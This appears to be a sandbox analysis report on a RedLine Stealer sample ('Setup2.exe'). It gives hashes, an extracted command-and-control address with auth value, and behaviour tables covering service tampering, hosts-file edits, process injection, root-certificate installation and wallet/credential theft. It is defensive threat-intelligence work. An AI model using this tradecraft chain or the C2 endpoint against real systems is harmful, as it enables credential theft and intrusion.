redline | 4754c64162263a12327a42ebcd023e7d0aaae400d02915c1c0ea972ce994842d

Analysis

max time kernel
151s
max time network
119s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
30-08-2022 13:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup2.exe
Size

4.5MB
MD5

7ede5e1864c423c59a1cb3bdcd7cc939
SHA1

f34f722ed04615441656ccef087e7b982ae09af9
SHA256

4754c64162263a12327a42ebcd023e7d0aaae400d02915c1c0ea972ce994842d
SHA512

47350800da01d48c6c5ae1a7132bb3f9ed1a247fefbd153b4ec890fd1946a5812ae901f18b775dcc30deeb61e712f42436fcee1ba642ed1b8086517b81c9c95b
SSDEEP

98304:dN1vJXa7MqmTWoYNag+r2UFKl2PjXvp0rcqh2MqnPs17EwoIsuimtRc:dLJXa7WTZrjPjxCh8M7VoJuicRc

Score

10^/10

redline discovery evasion exploit infostealer spyware

Malware Config

Extracted

Family

redline

185.200.191.18:80

Attributes

auth_value
a11ae941038a2a4398d552996dbd03f1

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/168328-245-0x000000000041A7DE-mapping.dmp	family_redline
behavioral1/memory/168328-253-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1000 created 416 1000 powershell.EXE winlogon.exe
PID 932 created 416 932 powershell.EXE winlogon.exe
Downloads MZ/PE file

description	pid	process	target process
PID 1000 created 416	1000	powershell.EXE	winlogon.exe
PID 932 created 416	932	powershell.EXE	winlogon.exe

Drops file in Drivers directory 2 IoCs

Processes:

Setup2.exeupdater.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Setup2.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 3 IoCs

Processes:

temp.exeupdater.execmd.exe

pid process

1792 temp.exe
568 updater.exe
1280 cmd.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

824 icacls.exe
168832 takeown.exe
168888 icacls.exe
452 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 4 IoCs

Processes:

taskeng.exeWerFault.exe

pid process

324 taskeng.exe
168408 WerFault.exe
168408 WerFault.exe
168408 WerFault.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

168832 takeown.exe
168888 icacls.exe
452 takeown.exe
824 icacls.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 ip-api.com

pid	process
1792	temp.exe
568	updater.exe
1280	cmd.exe

pid	process
824	icacls.exe
168832	takeown.exe
168888	icacls.exe
452	takeown.exe

pid	process
324	taskeng.exe
168408	WerFault.exe
168408	WerFault.exe
168408	WerFault.exe

pid	process
168832	takeown.exe
168888	icacls.exe
452	takeown.exe
824	icacls.exe

flow	ioc
3	ip-api.com

Drops file in System32 directory 6 IoCs

Processes:

powershell.exesvchost.exepowershell.exepowershell.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 4 IoCs

Processes:

Setup2.exepowershell.EXEcmd.exepowershell.EXE

description	pid	process	target process
PID 1896 set thread context of 972	1896	Setup2.exe	conhost.exe
PID 1000 set thread context of 1588	1000	powershell.EXE	dllhost.exe
PID 1280 set thread context of 168328	1280	cmd.exe	AppLaunch.exe
PID 932 set thread context of 168460	932	powershell.EXE	dllhost.exe

Drops file in Program Files directory 3 IoCs

Processes:

Setup2.exeupdater.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	Setup2.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	Setup2.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 6 IoCs

Processes:

svchost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

336 sc.exe
1924 sc.exe
112 sc.exe
168564 sc.exe
1920 sc.exe
532 sc.exe
1556 sc.exe
168400 sc.exe
168748 sc.exe
168836 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

168408 1280 WerFault.exe cmd.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

452 schtasks.exe

pid	process
336	sc.exe
1924	sc.exe
112	sc.exe
168564	sc.exe
1920	sc.exe
532	sc.exe
1556	sc.exe
168400	sc.exe
168748	sc.exe
168836	sc.exe

pid	pid_target	process	target process
168408	1280	WerFault.exe	cmd.exe

pid	process
452	schtasks.exe

Modifies data under HKEY_USERS 48 IoCs

Processes:

svchost.exepowershell.EXEupdater.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	updater.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2d\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00645bd786bcd801	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	updater.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updater.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My	svchost.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1280	reg.exe
1660	reg.exe
1488	reg.exe
1768	reg.exe
1924	reg.exe
584	reg.exe
168588	reg.exe
168496	reg.exe
1912	reg.exe
168476	reg.exe
168632	reg.exe
984	reg.exe
1388	reg.exe
1260	reg.exe
168348	reg.exe
168676	reg.exe
168900	reg.exe
1816	reg.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

temp.exeSetup2.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	temp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Setup2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Setup2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	temp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	temp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	temp.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeSetup2.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exedllhost.exe

pid	process
1176	powershell.exe
1768	powershell.exe
1768	powershell.exe
1896	Setup2.exe
1768	powershell.exe
1000	powershell.EXE
1000	powershell.EXE
1588	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
932	powershell.EXE
932	powershell.EXE
1628	powershell.exe
168460	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe
1588	dllhost.exe
1588	dllhost.exe
168460	dllhost.exe
168460	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeSetup2.exepowershell.exetemp.exepowershell.EXEdllhost.exesvchost.exepowershell.EXEpowershell.exedllhost.exeAppLaunch.exeupdater.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeShutdownPrivilege	1020	powercfg.exe
Token: SeShutdownPrivilege	1072	powercfg.exe
Token: SeShutdownPrivilege	1068	powercfg.exe
Token: SeShutdownPrivilege	856	powercfg.exe
Token: SeTakeOwnershipPrivilege	452	takeown.exe
Token: SeDebugPrivilege	1896	Setup2.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	1792	temp.exe
Token: SeDebugPrivilege	1000	powershell.EXE
Token: SeDebugPrivilege	1000	powershell.EXE
Token: SeDebugPrivilege	1588	dllhost.exe
Token: SeAuditPrivilege	872	svchost.exe
Token: SeDebugPrivilege	932	powershell.EXE
Token: SeDebugPrivilege	932	powershell.EXE
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	168460	dllhost.exe
Token: SeDebugPrivilege	168328	AppLaunch.exe
Token: SeDebugPrivilege	568	updater.exe
Token: SeShutdownPrivilege	168544	powercfg.exe
Token: SeShutdownPrivilege	168576	powercfg.exe
Token: SeShutdownPrivilege	168428	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup2.execmd.execmd.exe

description	pid	process	target process
PID 1896 wrote to memory of 1176	1896	Setup2.exe	powershell.exe
PID 1896 wrote to memory of 1176	1896	Setup2.exe	powershell.exe
PID 1896 wrote to memory of 1176	1896	Setup2.exe	powershell.exe
PID 1896 wrote to memory of 764	1896	Setup2.exe	cmd.exe
PID 1896 wrote to memory of 764	1896	Setup2.exe	cmd.exe
PID 1896 wrote to memory of 764	1896	Setup2.exe	cmd.exe
PID 1896 wrote to memory of 268	1896	Setup2.exe	cmd.exe
PID 1896 wrote to memory of 268	1896	Setup2.exe	cmd.exe
PID 1896 wrote to memory of 268	1896	Setup2.exe	cmd.exe
PID 764 wrote to memory of 336	764	cmd.exe	sc.exe
PID 764 wrote to memory of 336	764	cmd.exe	sc.exe
PID 764 wrote to memory of 336	764	cmd.exe	sc.exe
PID 764 wrote to memory of 532	764	cmd.exe	sc.exe
PID 764 wrote to memory of 532	764	cmd.exe	sc.exe
